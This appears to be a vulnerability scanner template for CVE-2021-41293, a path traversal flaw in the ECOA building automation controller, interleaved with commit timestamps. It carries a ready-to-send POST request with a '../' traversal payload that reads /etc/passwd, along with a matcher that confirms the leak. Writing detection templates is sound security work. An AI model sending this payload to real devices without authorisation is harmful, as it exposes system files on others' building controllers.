2021-10-14 14:35:25 +00:00
id : CVE-2021-41293
2021-09-16 17:44:04 +00:00
info :
2022-05-13 20:26:43 +00:00
name : ECOA Building Automation System - Arbitrary File Retrieval
2021-09-16 17:44:04 +00:00
author : 0x_Akoko
2021-09-14 22:02:57 +00:00
severity : high
2023-04-12 10:55:48 +00:00
description : The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to fix the arbitrary file retrieval vulnerability in the ECOA Building Automation System.
2021-10-14 13:30:44 +00:00
reference :
2022-03-07 15:36:19 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-41293
2021-10-14 13:30:44 +00:00
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
- https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
2021-10-14 14:37:07 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-10-14 14:37:07 +00:00
cve-id : CVE-2021-41293
cwe-id : CWE-22
2024-03-23 09:28:19 +00:00
epss-score : 0.05376
epss-percentile : 0.92942
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : ecoa
product : ecs_router_controller-ecs_firmware
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,ecoa,lfi,disclosure
2021-09-14 22:02:57 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-14 22:02:57 +00:00
- raw :
- |
POST /viewlog.jsp HTTP/1.1
Host : {{Hostname}}
2021-09-14 22:24:11 +00:00
yr=2021&mh=6&fname=../../../../../../../../etc/passwd
2021-09-17 11:09:09 +00:00
matchers-condition : and
2021-09-14 22:24:11 +00:00
matchers :
2021-09-14 22:02:57 +00:00
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-09-17 11:09:09 +00:00
- type : status
status :
- 200
2024-01-26 08:31:11 +00:00
# digest: 490a0046304402207e2bc7edcfaf0409a9a1d6928deb45a0266ff9d5d47b7ce85d64465c023a67d802202ad3f5fc47211b536a4fb3112aa4be29776eeedb0d87b44604603c02d4667e30:922c64590222798bb761d5b6d8e72950